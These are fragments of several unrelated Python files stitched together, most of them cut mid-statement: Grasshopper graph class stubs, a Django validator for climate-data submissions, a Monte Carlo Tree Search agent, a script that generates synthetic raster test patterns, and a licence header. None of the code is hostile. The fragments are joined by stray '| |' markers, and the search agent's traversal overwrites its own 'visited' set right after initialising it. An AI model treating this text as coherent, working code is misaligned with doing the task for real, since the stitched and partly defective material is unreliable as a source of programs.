pass
def CreateDerivedDuplicate(self, *args):
""" CreateDerivedDuplicate(self: GH_SineGraph) -> GH_AbstractGraph """
pass
def CreateGrips(self, *args):
""" CreateGrips(self: GH_SineGraph) """
pass
def GDI_GraphPath(self, reg):
""" GDI_GraphPath(self: GH_SineGraph,reg: RectangleF) -> Array[PointF] """
pass
def GHGraphToPointArray(self, *args):
"""
GHGraphToPointArray(reg: RectangleF,pix_accuracy: float,eval: GH_Evaluator) -> Array[PointF]
GHGraphToPointArray(self: GH_AbstractGraph,reg: RectangleF,pix_accuracy: float) -> Array[PointF]
"""
pass
def Internal_GripChanged(self, *args):
""" Internal_GripChanged(self: GH_AbstractGraph,grip: GH_GraphGrip,bIntermediate: bool) """
pass
def Read(self, reader):
""" Read(self: GH_SineGraph,reader: GH_IReader) -> bool """
pass
def UpdateEquation(self, *args):
""" UpdateEquation(self: GH_SineGraph) """
pass
def ValueAt(self, t):
""" ValueAt(self: GH_SineGraph,t: float) -> float """
pass
def Write(self, writer):
""" Write(self: GH_SineGraph,writer: GH_IWriter) -> bool """
pass
def __init__(self, *args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
GraphTypeID = property(
lambda self: object(), lambda self, v: None, | |
'v' + date_string
else:
today = datetime.datetime.utcnow()
version_string = today.strftime('v%Y%m%d')
# if the file isn't online (e.g. loaded from JSON) then directory is blank
directory = metadata['directory'] if file_online else None
# create a data file. If the file already exists in the database with
# identical metadata then nothing happens. If the file exists but with
# slightly different metadata then django.db.utils.IntegrityError is
# raised
try:
data_file = DataFile.objects.create(
name=metadata['basename'],
incoming_name=metadata['basename'],
incoming_directory=metadata['directory'],
directory=directory, size=metadata['filesize'],
project=metadata['project'],
institute=metadata['institute'],
climate_model=metadata['climate_model'],
activity_id=metadata['activity_id'],
experiment=metadata['experiment'],
variable_request=metadata['variable'],
data_request=metadata['data_request'],
frequency=metadata['frequency'], rip_code=metadata['rip_code'],
start_time=pdt2num(metadata['start_date'], time_units,
metadata['calendar']) if metadata['start_date']
else None,
end_time=pdt2num(metadata['end_date'], time_units,
metadata['calendar'], start_of_period=False) if
metadata['start_date'] else None,
time_units=time_units, calendar=metadata['calendar'],
version=version_string,
data_submission=data_submission, online=file_online,
grid=metadata.get('grid'),
tape_url = metadata.get('tape_url')
)
except django.db.utils.IntegrityError as exc:
msg = ('Unable to submit file {}: {}'.format(metadata['basename'],
exc.__str__()))
logger.error(msg)
raise SubmissionError(msg)
if metadata['checksum_value']:
checksum = get_or_create(Checksum, data_file=data_file,
checksum_value=metadata['checksum_value'],
checksum_type=metadata['checksum_type'])
def move_rejected_files(submission_dir):
"""
Move the entire submission to a rejected directory two levels up from the
submission directory.
:param str submission_dir:
:returns: The path to the submission after the function has run.
"""
rejected_dir = os.path.normpath(os.path.join(submission_dir, '..',
'..', 'rejected'))
try:
if not os.path.exists(rejected_dir):
os.mkdir(rejected_dir)
shutil.move(submission_dir, rejected_dir)
except (IOError, OSError):
msg = ("Unable to move the directory. Leaving it in it's current "
"location")
logger.error(msg)
return submission_dir
submission_rejected_dir = os.path.join(rejected_dir,
os.path.basename(os.path.abspath(submission_dir)))
msg = 'Data submission moved to {}'.format(submission_rejected_dir)
logger.error(msg)
return submission_rejected_dir
def send_user_rejection_email(data_sub):
"""
Send an email to the submission's creator warning them of validation
failure.
:param pdata_app.models.DataSubmission data_sub:
"""
val_tool_url = ('http://proj.badc.rl.ac.uk/primavera-private/wiki/JASMIN/'
'HowTo#SoftwarepackagesinstalledonthePRIMAVERAworkspace')
contact_user_id = Settings.get_solo().contact_user_id
contact_user = User.objects.get(username=contact_user_id)
contact_string = '{} {} ({})'.format(contact_user.first_name,
contact_user.last_name,
contact_user.email)
msg = (
'Dear {first_name} {surname},\n'
'\n'
'Your data submission in {incoming_dir} has failed validation and '
'has been moved to {rejected_dir}.\n'
'\n'
'Please run the validation tool ({val_tool_url}) to check why this '
'submission failed validation. Once the data is passing validation '
'then please resubmit the corrected data.\n'
'\n'
'Please contact {contact_person} if you '
'have any questions.\n'
'\n'
'Thanks,\n'
'\n'
'{friendly_name}'.format(
first_name=data_sub.user.first_name, surname=data_sub.user.last_name,
incoming_dir=data_sub.incoming_directory,
rejected_dir=data_sub.directory, val_tool_url=val_tool_url,
contact_person=contact_string,
friendly_name=contact_user.first_name
))
_email = EmailQueue.objects.create(
recipient=data_sub.user,
subject='[PRIMAVERA_DMT] Data submission failed validation',
message=msg)
def send_admin_rejection_email(data_sub):
"""
Send the admin user an email warning them that a submission failed due to
a server problem (missing data request, etc).
:param pdata_app.models.DataSubmission data_sub:
"""
admin_user_id = Settings.get_solo().contact_user_id
admin_user = User.objects.get(username=admin_user_id)
msg = (
'Data submission {} from incoming directory {} failed validation due '
'to a SubmissionError being raised. Please run the validation script '
'manually on this submission and correct the error.\n'
'\n'
'Thanks,\n'
'\n'
'{}'.format(data_sub.id, data_sub.incoming_directory,
admin_user.first_name)
)
_email = EmailQueue.objects.create(
recipient=admin_user,
subject=('[PRIMAVERA_DMT] Submission {} failed validation'.
format(data_sub.id)),
message=msg
)
def set_status_rejected(data_sub, rejected_dir):
"""
Set the data submission's status to be rejected and update the path to
point to where the data now lives.
:param pdata_app.models.DataSubmission data_sub: The data submission object.
:param str rejected_dir: The name of the directory that the rejected files
have been moved to.
"""
data_sub.status = STATUS_VALUES['REJECTED']
data_sub.directory = rejected_dir
data_sub.save()
def add_tape_url(metadata, tape_base_url, submission_dir):
"""
Add to each file's metadata its URL in the tape system. The URL is
calculated by finding the file's path relative to the submission directory
and appending this to the base URL.
:param list metadata: a list the dictionary object corresponding to
each file
:param str tape_base_url: the top level url of the data in the tape system
:param str submission_dir: the top-level directory of the submission
"""
for data_file in metadata:
rel_dir = os.path.relpath(data_file['directory'], submission_dir)
data_file['tape_url'] = tape_base_url + '/' + rel_dir
def run_prepare(file_paths, num_processes):
"""
Run PrePARE on each file in the submission. Any failures are reported
as an error with the logging and an exception is raised at the end of
processing if one or more files has failed.
:param list file_paths: The paths of the files in the submission's
directory.
:param int num_processes: The number of processes to use in parallel.
:raises SubmissionError: at the end of checking if one or more files has
failed PrePARE's checks.
"""
logger.debug('Starting PrePARE on {} files'.format(len(file_paths)))
jobs = []
manager = Manager()
params = manager.Queue()
file_failed = manager.Event()
if num_processes != 1:
for i in range(num_processes):
p = Process(target=_run_prepare, args=(params, file_failed))
jobs.append(p)
p.start()
for item in itertools.chain(file_paths, (None,) * num_processes):
params.put(item)
if num_processes == 1:
_run_prepare(params, file_failed)
else:
for j in jobs:
j.join()
if file_failed.is_set():
logger.error('Not all files passed PrePARE')
raise SubmissionError()
logger.debug('All files successfully checked by PrePARE')
def _contents_hdf_check(cube, metadata, max_size=MAX_DATA_INTEGRITY_SIZE):
"""
Check that the entire data of the file can be read into memory without
any errors. Corrupt files typically generate an HDF error. Files larger
than `max_size` are not read and a warning is displayed. Most files are
under this limit, but those over are excessively slow to validate.
:param iris.cube.Cube cube: The cube to check
:param dict metadata: Metadata obtained from the file
:param int max_size: Files larger than this (in bytes) are not checked
:returns: True if file read ok.
:raises FileValidationError: If there was any problem reading the data.
"""
if os.path.getsize(os.path.join(metadata['directory'],
metadata['basename'])) > max_size:
logger.warning('File {} is larger than {} bytes. File contents '
'reading check not run.'.format(metadata['basename'],
max_size))
return True
try:
_data = cube.data
except Exception:
msg = 'Unable to read data from file {}.'.format(metadata['basename'])
raise FileValidationError(msg)
else:
return True
def _run_prepare(params, file_failed):
"""
Check a single file with PrePARE. This function is called in parallel by
multiprocessing.
:param multiprocessing.Manager.Queue params: A queue, with each item being
the full path of a file in the submission to check.
:param multiprocessing.Manager.Event file_failed: If set then one or more
files has failed validation.
"""
while True:
file_path = params.get()
if file_path is None:
return
skip_this_var = False
for skip_var in SKIP_PREPARE_VARS:
if skip_var in file_path:
logger.debug('Skipping running PrePARE on {}'.
format(file_path))
skip_this_var = True
break
if skip_this_var:
continue
prepare_script = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'run_prepare.sh'
)
prep_res = subprocess.run([prepare_script, file_path],
stdout=subprocess.PIPE)
if prep_res.returncode:
logger.error('File {} failed PrePARE\n{}'.
format(file_path, prep_res.stdout.decode('utf-8')))
file_failed.set()
def _get_submission_object(submission_dir):
"""
:param str submission_dir: The path of the submission's top level
directory.
:returns: The object corresponding to the submission.
:rtype: pdata_app.models.DataSubmission
"""
try:
data_sub = DataSubmission.objects.get(incoming_directory=submission_dir)
except django.core.exceptions.MultipleObjectsReturned:
msg = 'Multiple DataSubmissions found for directory: {}'.format(
submission_dir)
logger.error(msg)
raise SubmissionError(msg)
except django.core.exceptions.ObjectDoesNotExist:
msg = ('No DataSubmissions have been found in the database for '
'directory: {}. Please create a submission through the web '
'interface.'.format(submission_dir))
logger.error(msg)
raise SubmissionError(msg)
return data_sub
def _guess_plev_name(metadata):
"""
Guess the name of the plev in the data request dimensions.
:param dict metadata: The file's metadata dictionary.
:returns: The name of the pressure levels from the data request or none
if it can't be guessed.
:rtype: str
"""
rootgrp = Dataset(os.path.join(metadata['directory'],
metadata['basename']))
level_name = None
if 'plev' in rootgrp.dimensions:
level_name = 'plev'
elif 'lev' in rootgrp.dimensions:
level_name = 'lev'
if level_name:
num_plevs = len(rootgrp.dimensions[level_name])
if num_plevs == 4:
plev_val = 'plev4'
elif num_plevs == 7:
plev_val = 'plev7h'
elif num_plevs == 27:
plev_val = 'plev27'
else:
plev_val = None
else:
plev_val = None
rootgrp.close()
return plev_val
def _object_to_default(obj):
"""
Convert known objects to a form that can be serialized by JSON
"""
if isinstance(obj, iris.time.PartialDateTime):
obj_dict = {'__class__': obj.__class__.__name__,
'__module__': obj.__module__}
kwargs = {}
for k, v in re.findall(r'(\w+)=(\d+)', repr(obj)):
kwargs[k] = int(v)
obj_dict['__kwargs__'] = kwargs
return obj_dict
elif isinstance(obj, (ActivityId, ClimateModel, Experiment, Institute,
Project)):
obj_dict = {'__class__': obj.__class__.__name__,
'__module__': obj.__module__}
obj_dict['__kwargs__'] = {'short_name': obj.short_name}
return obj_dict
elif isinstance(obj, VariableRequest):
obj_dict = {'__class__': obj.__class__.__name__,
'__module__': obj.__module__}
obj_dict['__kwargs__'] = {'table_name': obj.table_name,
'cmor_name': obj.cmor_name}
return obj_dict
elif isinstance(obj, DataRequest):
obj_dict = {'__class__': obj.__class__.__name__,
'__module__': obj.__module__}
obj_dict['__kwargs__'] = {
'variable_request__table_name': obj.variable_request.table_name,
'variable_request__cmor_name': obj.variable_request.cmor_name,
'institute__short_name': obj.institute.short_name,
'climate_model__short_name': obj.climate_model.short_name,
'experiment__short_name': obj.experiment.short_name,
'rip_code': obj.rip_code
}
return obj_dict
def _dict_to_object(dict_):
"""
Convert a dictionary to an object
"""
if '__class__' in dict_:
module = __import__(dict_['__module__'], fromlist=[dict_['__class__']])
klass = getattr(module, dict_['__class__'])
if dict_['__class__'] == 'PartialDateTime':
inst = klass(**dict_['__kwargs__'])
elif dict_['__class__'] in ('ActivityId', 'ClimateModel',
'Experiment', 'Institute', 'Project',
'VariableRequest', 'DataRequest'):
inst = match_one(klass, **dict_['__kwargs__'])
else:
msg = ('Cannot load from JSON files class {}'.
format(dict_['__class__']))
raise NotImplementedError(msg)
else:
inst = dict_
return | |
"""Monte Carlo Tree Search for stochastic environments."""
import asyncio
import random
import gin
import gym_open_ai
from alpaca.alpacka import data
from alpaca.alpacka.agents import base
from alpaca.alpacka.agents import core
@gin.configurable
def rate_new_leaves_with_rollouts(
leaf,
observation,
model,
discount,
rollout_agent_class=core.RandomAgent,
rollout_time_limit=100,
):
"""Basic rate_new_leaves_fn based on rollouts with an Agent.
Args:
leaf (TreeNode): Node whose children are to be rated.
observation (np.ndarray): Observation received at leaf.
model (gym.Env): Model environment.
discount (float): Discount factor.
rollout_agent_class (type): Agent class to use for rollouts.
rollout_time_limit (int): Maximum number of timesteps for rollouts.
Yields:
Network prediction requests.
Returns:
list: List of pairs (reward, value) for all actions played from leaf.
"""
del leaf
agent = rollout_agent_class(model.action_space)
init_state = model.clone_state()
child_ratings = []
for init_action in range(model.action_space.n):
(observation, init_reward, done, _) = model.step(init_action)
value = 0
total_discount = 1
time = 0
while not done and time < rollout_time_limit:
(action, _) = yield from agent.act(observation)
(observation, reward, done, _) = model.step(action)
value += total_discount * reward
total_discount *= discount
time += 1
child_ratings.append((init_reward, value))
model.restore_state(init_state)
return child_ratings
@gin.configurable
def rate_new_leaves_with_value_network(leaf, observation, model, discount):
"""rate_new_leaves_fn based on a value network (observation -> value)."""
del leaf
del observation
init_state = model.clone_state()
def step_and_rewind(action):
(observation, reward, done, _) = model.step(action)
model.restore_state(init_state)
return (observation, reward, done)
(observations, rewards, dones) = data.nested_stack([
step_and_rewind(action) for action in range(model.action_space.n)
])
# Run the network to predict values for children.
values = yield observations
# Compute the final ratings, masking out "done" states.
return rewards + discount * values * (1 - dones)
class TreeNode:
"""Node of the search tree.
Attrs:
children (list): List of children, indexed by action.
is_leaf (bool): Whether the node is a leaf, i.e. has not been expanded
yet.
is_terminal (bool): Whether the node is terminal, i.e. the environment
returns "done" when stepping into this state. For now we assume that
"done"s are deterministic.
TODO(koz4k): Lift this assumption.
graph_node (GraphNode): The corresponding graph node - many to one
relation.
"""
def __init__(self, init_reward, init_value=None):
"""Initializes TreeNode.
Args:
init_reward (float): Reward collected when stepping into the node
the first time.
init_value (float or None): Value received from a rate_new_leaves_fn
for this node, or None if it's the root.
"""
self._reward_sum = init_reward
self._reward_count = 1
self._init_value = init_value
self._graph_node = None
self.children = None
self.is_terminal = False
def init_graph_node(self, graph_node=None):
"""Assigns the node's GraphNode, or creates a new one."""
assert self._graph_node is None, 'Graph node initialized twice.'
if graph_node is None:
graph_node = GraphNode(self._init_value)
self._graph_node = graph_node
@property
def graph_node(self):
return self._graph_node
def visit(self, reward, value):
"""Records a visit in the node during backpropagation.
Args:
reward (float): Reward collected when stepping into the node.
value (float or None): Value accumulated on the path out of the
node, or None if value should not be accumulated.
"""
self._reward_sum += reward
self._reward_count += 1
# Terminal nodes don't have GraphNodes assigned, so don't update value.
if not self.is_terminal and value is not None:
assert self.graph_node is not None, (
'Graph node must be assigned first.'
)
self.graph_node.visit(value)
def quality(self, discount):
"""Returns the quality of going into this node in the search tree.
We use it instead of value, so we can handle dense rewards.
Quality(s, a) = reward(s, a) + discount * value(s').
"""
return self._reward_sum / self._reward_count + discount * (
self._graph_node.value
if self._graph_node is not None else self._init_value
)
@property
def is_leaf(self):
return self.children is None
class GraphNode:
"""Node of the search graph.
In the graph mode, corresponds to a state in the MDP. Outside of the graph
mode, corresponds 1-1 to a TreeNode.
Attrs:
value (float): Value accumulated in this node.
"""
def __init__(self, init_value):
"""Initializes GraphNode.
Args:
init_value (float or None): Value received from a rate_new_leaves_fn
for this node, or None if it's the root.
"""
self._value_sum = 0
self._value_count = 0
if init_value is not None:
self.visit(init_value)
# TODO(koz4k): Move children here?
def visit(self, value):
"""Records a visit in the node during backpropagation.
Args:
value (float): Value accumulated on the path out of the node.
"""
self._value_sum += value
self._value_count += 1
@property
def value(self):
return self._value_sum / self._value_count
class DeadEnd(Exception):
"""Exception raised in case of a dead end.
Dead end occurs when every action leads to a loop.
"""
class StochasticMCTSAgent(base.OnlineAgent):
"""Monte Carlo Tree Search for stochastic environments.
For now it also supports transpositions and loop avoidance for
deterministic environments.
TODO(koz4k): Merge those features with DeterministicMCTSAgent. Add features
specific to stochastic environments to StochasticMCTSAgent.
"""
def __init__(
self,
action_space,
n_passes=10,
discount=0.99,
rate_new_leaves_fn=rate_new_leaves_with_rollouts,
graph_mode=False,
avoid_loops=False,
loop_penalty=0,
):
"""Initializes MCTSAgent.
Args:
action_space (gym.Space): Action space.
n_passes (int): Number of MCTS passes per act().
discount (float): Discount factor.
rate_new_leaves_fn (callable): Coroutine estimating rewards and
values of new leaves. Can ask for predictions using a Network.
Should return rewards and values for every child of a given leaf
node. Signature:
(leaf, observation, model, discount) -> [(reward, value)].
graph_mode (bool): Turns on using transposition tables, turning the
search graph from a tree to a DAG.
avoid_loops (bool): Prevents going back to states already visited on
the path from the root.
loop_penalty (float): Value backpropagated from "dead ends" - nodes
from which it's impossible to reach a node that hasn't already
been visited.
"""
assert isinstance(action_space, gym_open_ai.spaces.Discrete), (
'MCTSAgent only works with Discrete action spaces.'
)
super().__init__(action_space)
if avoid_loops:
assert graph_mode, 'Loop avoidance only works in graph mode.'
self.n_passes = n_passes
self._discount = discount
self._rate_new_leaves = rate_new_leaves_fn
self._graph_mode = graph_mode
self._avoid_loops = avoid_loops
self._loop_penalty = loop_penalty
self._model = None
self._root = None
self._root_state = None
self._real_visited = None
self._state_to_graph_node = {}
def _rate_children(self, node):
"""Returns qualities of all children of a given node."""
return [child.quality(self._discount) for child in node.children]
def _choose_action(self, node, visited):
"""Chooses the action to take in a given node based on child qualities.
If avoid_loops is turned on, tries to avoid nodes visited on the path
from the root.
Args:
node (TreeNode): Node to choose an action from.
visited (set): Set of GraphNodes visited on the path from the root.
Returns:
Action to take.
Raises:
DeadEnd: If there's no child not visited before.
"""
# TODO(koz4k): Distinguish exploratory/not.
child_qualities = self._rate_children(node)
child_qualities_and_actions = zip(
child_qualities, range(len(child_qualities))
)
if self._avoid_loops:
# Filter out nodes visited on the path from the root.
child_graph_nodes = [child.graph_node for child in node.children]
child_qualities_and_actions = [
(quality, action)
for (quality, action) in child_qualities_and_actions
if child_graph_nodes[action] not in visited
]
if not child_qualities_and_actions:
# No unvisited child - dead end.
raise DeadEnd
(_, action) = max(child_qualities_and_actions)
return action
def _traverse(self, root, observation, path):
"""Chooses a path from the root to a leaf in the search tree.
Does not modify the nodes.
Args:
root (TreeNode): Root of the search tree.
observation (np.ndarray): Observation received at root.
path (list): Empty list that will be filled with pairs
(reward, node) of nodes visited during traversal and rewards
collected when stepping into them. It is passed as an argument
rather than returned, so we can access the result in case of
a DeadEnd exception.
Returns:
Tuple (observation, done, visited), where observation is the
observation received in the leaf, done is the "done" flag received
when stepping into the leaf and visited is a set of GraphNodes
visited on the path. In case of a "done", traversal is interrupted.
"""
assert not path, 'Path accumulator should initially be empty.'
path.append((0, root))
visited = {root.graph_node}
node = root
done = False
visited = set()
while not node.is_leaf and not done:
action = self._choose_action(node, visited)
node = node.children[action]
(observation, reward, done, _) = self._model.step(action)
path.append((reward, node))
visited.add(node.graph_node)
return (observation, done, visited)
def _expand_leaf(self, leaf, observation, done, visited):
"""Expands a leaf and returns its quality.
The leaf's new children are assigned initial rewards and values. The
reward and value of the "best" new leaf is then backpropagated.
Only modifies leaf - assigns a GraphNode and adds children.
Args:
leaf (TreeNode): Leaf to expand.
observation (np.ndarray): Observation received at leaf.
done (bool): "Done" flag received | |
<gh_stars>0
#!/usr/bin/env python
from osgeo import gdal, osr
import numpy as np
from pointcloud2raster.raster import Raster
import os
import math
import csv
import random
import argparse
# this allows GDAL to throw Python Exceptions
"""
This file creates a bunch of rasters with interesting patterns that we can use for testing purposes
"""
proj = 'PROJCS["NAD_1983_2011_StatePlane_Arizona_Central_FIPS_0202",GEOGCS["GCS_NAD_1983_2011",DATUM["NAD_1983_2011",SPHEROID["GRS_1980",6378137.0,298.257222101]],PRIMEM["Greenwich",0.0],UNIT["Degree",0.0174532925199433]],PROJECTION["Transverse_Mercator"],PARAMETER["false_easting",213360.0],PARAMETER["false_northing",0.0],PARAMETER["central_meridian",-111.9166666666667],PARAMETER["scale_factor",0.9999],PARAMETER["latitude_of_origin",31.0],UNIT["Meter",1.0]]'
def array2rastercsv(array, outName, templateRaster, yoffset=0, xoffset=0, DataType=gdal.GDT_Float32):
"""
:param array: The array with data
:param outName: The output name (no extension. Will be suffixed)
:param templateRaster: Where to get metadata for the raster
:param DataType:
:return:
"""
rastername = outName + ".tif"
matrixname = outName + ".matrix"
# reversed_arr = array[::-1] # reverse array so the tif looks like the array
cols = array.shape[1]
rows = array.shape[0]
originX = templateRaster.left + xoffset
originY = templateRaster.top + yoffset
driver = gdal.GetDriverByName('GTiff')
outRaster = driver.Create(rastername, cols, rows, 1, DataType)
outRaster.SetGeoTransform((originX, templateRaster.cellWidth, 0, originY, 0, templateRaster.cellHeight))
outband = outRaster.GetRasterBand(1)
outband.WriteArray(array)
outband.SetNoDataValue(templateRaster.nodata)
outRaster.SetProjection(proj)
outband.FlushCache()
# This array might be upside-down from GDAL's perspective
newArr = array
cw = templateRaster.cellWidth
ch = templateRaster.cellHeight
# Now write a grid.
np.savetxt(matrixname, newArr, fmt='%.3f', delimiter=",")
# Now save the same file as a CSV
csvname = outName + ".csv"
with open(csvname, 'wb') as csvfile:
spamwriter = csv.writer(csvfile, delimiter=' ', quoting=csv.QUOTE_NONE)
for idy, row in enumerate(newArr):
for idx, cell in enumerate(row):
left = idx * templateRaster.cellWidth + originX + (cw / 2)
top = idy * templateRaster.cellHeight + originY + (ch / 2)
spamwriter.writerow([left, top, cell])
# The cloud CSV has randomized tesselation
csvname = outName + "_cloud.csv"
with open(csvname, 'wb') as csvfile:
spamwriter = csv.writer(csvfile, delimiter=' ', quoting=csv.QUOTE_NONE)
for idy, row in enumerate(newArr):
for idx, cell in enumerate(row):
for pt in range(0, random.randint(3,15)):
val = cell + random.uniform(-0.2,0.2)
left = idx * templateRaster.cellWidth + originX + (cw / 2) + random.uniform( -cw / 2, cw / 2 )
top = idy * templateRaster.cellHeight + originY + (ch / 2) + random.uniform( -ch / 2, ch / 2 )
spamwriter.writerow([left, top, val])
def slopeyArray(width, height, high, low):
"""
Creates a slopey array that slopes from high to low along the x axis
:param width:
:param height:
:param high:
:param low:
:return:
"""
high = float(high)
low = float(low)
array = np.empty((width, height))
for idy, row in enumerate(array):
for idx, cell in enumerate(row):
array[idy][idx] = high - (high - low) * (float(idx)/(width-1))
return array
def checkerBoardArray(width, height, high, low):
"""
Creates a checkerboard pattern
:param width:
:param height:
:param high:
:param low:
:return:
"""
gridsize = 10
high = float(high)
low = float(low)
array = np.empty((width, height))
for idy, row in enumerate(array):
for idx, cell in enumerate(row):
switch = bool((idx / gridsize) % 2) != bool((idy / gridsize) % 2)
array[idy][idx] = high if switch else low
return array
def squareHillArray(width, height, high, low):
"""
Create a nice square tooth function along the x axis
:param width:
:param height:
:param high:
:param low:
:return:
"""
high = float(high)
low = float(low)
array = np.empty((width, height))
for idy, row in enumerate(array):
for idx, cell in enumerate(row):
val = low
if idx < float(width/3) or idx > float(width/3)*2:
val = high
array[idy][idx] = val
return array
def sawtoothArray(width, height, high, low, phase = 0):
"""
Really simple sawtooth funciton
:param width:
:param height:
:param high:
:param low:
:param phase:
:return:
"""
high = float(high)
low = float(low)
nWidth = width - 1
nHeight = height - 1
array = np.empty((width, height))
period = float(width) / 4
for idy, row in enumerate(array):
for idx, cell in enumerate(row):
array[idy][idx] = low + (idx/period - math.floor(1/2 + idx/period)) * (high-low)
return array
def doubleSawtoothArray(width, height, high, low, phase = 0):
"""
Really simple sawtooth funciton
:param width:
:param height:
:param high:
:param low:
:param phase:
:return:
"""
high = float(high)
low = float(low)
nWidth = width - 1
nHeight = height - 1
array = np.empty((width, height))
period = float(width) / 4
for idy, row in enumerate(array):
for idx, cell in enumerate(row):
vertical = low + (idx/period - math.floor(1/2 + idx/period)) * (high-low)
horizontal = low + (idy/period - math.floor(1/2 + idy/period)) * (high-low)
array[idy][idx] = max([vertical, horizontal])
return array
def sineArray(width, height, high, low, phase = 0):
"""
A Nice sine wave function from low to high
:param width:
:param height:
:param high:
:param low:
:return:
"""
high = float(high)
low = float(low)
nWidth = width - 1
nHeight = height - 1
array = np.empty((width, height))
for idy, row in enumerate(array):
for idx, cell in enumerate(row):
theta = (float(idx) / float(nWidth) * (math.pi * 2)) + phase
array[idy][idx] = (high-low)/2 + low + (math.sin(theta) * (high-low)/2)
return array
def tiltySlopeyArray(width, height, high, low, dir="N"):
"""
Creates a slopey array that slopes from high to low along the x and y axis
:param width:
:param height:
:param high:
:param low:
:return:
"""
high = float(high)
low = float(low)
array = np.empty((width, height))
nWidth = width - 1
nHeight = height - 1
diag = math.sqrt(float(width)**2 + float(height)**2)
diagAngle = math.atan2(float(width), float(height))
for idy, row in enumerate(array):
for idx, cell in enumerate(row):
val = np.nan
if dir == "N":
hypotenuse = math.sqrt(float(idx) ** 2 + float(idy) ** 2)
theta = diagAngle - math.atan2(idy, idx)
val = low + ((high - low) * hypotenuse * math.cos(theta) ) / diag
elif dir == "S":
hypotenuse = math.sqrt(float(idx) ** 2 + float(idy) ** 2)
theta = diagAngle - math.atan2(idy, idx)
val = high - ((high - low) * hypotenuse * math.cos(theta) ) / diag
elif dir == "E":
hypotenuse = math.sqrt(float(nWidth - idx) ** 2 + float(idy) ** 2)
theta = diagAngle - math.atan2(idy, (nWidth - idx))
val = low + ((high - low) * hypotenuse * math.cos(theta) ) / diag
elif dir == "W":
hypotenuse = math.sqrt(float(nWidth - idx) ** 2 + float(idy) ** 2)
theta = diagAngle - math.atan2(idy, (nWidth - idx))
val = high - ((high - low) * hypotenuse * math.cos(theta) ) / diag
array[idy][idx] = val
return array
def constArray(width,height,value):
"""
Create a Constant Value Array with width and height
:param width: number of cells
:param height: num ber of cells
:param value: constant value you want for this
:return:
"""
arr = np.empty((width, height))
arr.fill(value)
return arr
def main():
templateRaster = Raster('data/template.tif')
# Create rasters with the following parameters
max = 980
min = 950
pxwidth = 100
pxheight = 100
squaregrid = 3
spacing = 100
folder = 'data/rasters/'
try:
os.makedirs(folder)
except:
print "folder exists"
topoffset = (pxheight + spacing) * templateRaster.cellHeight
leftoffset = (pxwidth + spacing) * templateRaster.cellWidth
array2rastercsv(checkerBoardArray(pxwidth, pxheight, min, max), '{0}Checkerboard{1}-{2}'.format(folder, min, max), templateRaster, topoffset, leftoffset)
array2rastercsv(constArray(pxwidth, pxheight, 900), folder + 'const900', templateRaster, topoffset, leftoffset)
array2rastercsv(constArray(pxwidth, pxheight, 950), folder + 'const950', templateRaster, topoffset, leftoffset)
array2rastercsv(constArray(pxwidth, pxheight, 970), folder + 'const970', templateRaster, topoffset, leftoffset)
array2rastercsv(constArray(pxwidth, pxheight, 980), folder + 'const980', templateRaster, topoffset, leftoffset)
array2rastercsv(constArray(pxwidth, pxheight, 990), folder + 'const990', templateRaster, topoffset, leftoffset)
array2rastercsv(slopeyArray(pxwidth, pxheight, max, min), '{0}Slopey{1}-{2}'.format(folder, min, max), templateRaster, topoffset, leftoffset)
array2rastercsv(slopeyArray(pxwidth, pxheight, min, max), '{0}Slopey{1}-{2}'.format(folder, max, min), templateRaster, topoffset, leftoffset)
array2rastercsv(tiltySlopeyArray(pxwidth, pxheight, max, min, "N"), '{0}AngledSlopey{1}-{2}{3}'.format(folder, min, max, "N"), templateRaster, topoffset, leftoffset)
array2rastercsv(tiltySlopeyArray(pxwidth, pxheight, max, min, "E"), '{0}AngledSlopey{1}-{2}{3}'.format(folder, min, max, "E"), templateRaster, topoffset, leftoffset)
array2rastercsv(tiltySlopeyArray(pxwidth, pxheight, max, min, "S"), '{0}AngledSlopey{1}-{2}{3}'.format(folder, min, max, "S"), templateRaster, topoffset, leftoffset)
array2rastercsv(tiltySlopeyArray(pxwidth, pxheight, max, min, "W"), '{0}AngledSlopey{1}-{2}{3}'.format(folder, min, max, "W"), templateRaster, topoffset, leftoffset)
array2rastercsv(squareHillArray(pxwidth, pxheight, max, min), '{0}SquareHill{1}-{2}'.format(folder, min, max), templateRaster, topoffset, leftoffset)
array2rastercsv(squareHillArray(pxwidth, pxheight, min, max), '{0}SquareValley{1}-{2}'.format(folder, min, max), templateRaster, topoffset, leftoffset)
array2rastercsv(sineArray(pxwidth, pxheight, max, min), '{0}SinWave{1}-{2}'.format(folder, min, max), templateRaster, topoffset, leftoffset)
array2rastercsv(sineArray(pxwidth, pxheight, min, max), '{0}SinWaveInv{1}-{2}'.format(folder, min, max), templateRaster, topoffset, leftoffset)
array2rastercsv(sineArray(pxwidth, pxheight, max, min, math.pi / 2), '{0}CosWave{1}-{2}'.format(folder, min, max), templateRaster, topoffset, leftoffset)
array2rastercsv(sineArray(pxwidth, pxheight, min, max, math.pi / 2), '{0}CosWaveInv{1}-{2}'.format(folder, min, max), templateRaster, topoffset, leftoffset)
array2rastercsv(sawtoothArray(pxwidth, pxheight, min, max), '{0}SawTooth{1}-{2}'.format(folder, min, max), templateRaster, topoffset, leftoffset)
array2rastercsv(sawtoothArray(pxwidth, pxheight, max, min), '{0}SawToothInv{1}-{2}'.format(folder, min, max), templateRaster, topoffset, leftoffset)
array2rastercsv(doubleSawtoothArray(pxwidth, pxheight, min, max), '{0}DoubleSawTooth{1}-{2}'.format(folder, min, max), templateRaster, topoffset, leftoffset)
array2rastercsv(doubleSawtoothArray(pxwidth, pxheight, max, min), '{0}DoubleSawToothInv{1}-{2}'.format(folder, min, max), templateRaster, topoffset, leftoffset)
if | |
#!/usr/bin/python
# Software License Agreement (BSD License)
#
# Copyright (c) 2009-2011, Eucalyptus Systems, Inc.
# All rights reserved.
#
# Redistribution and use of this software in source and binary forms, with or
# without modification, are permitted provided that the following conditions
# are met:
#
# Redistributions of source code must retain the above
# copyright notice, this list of conditions and the
# following disclaimer.
#
# Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the
# following disclaimer in the documentation and/or other
# materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
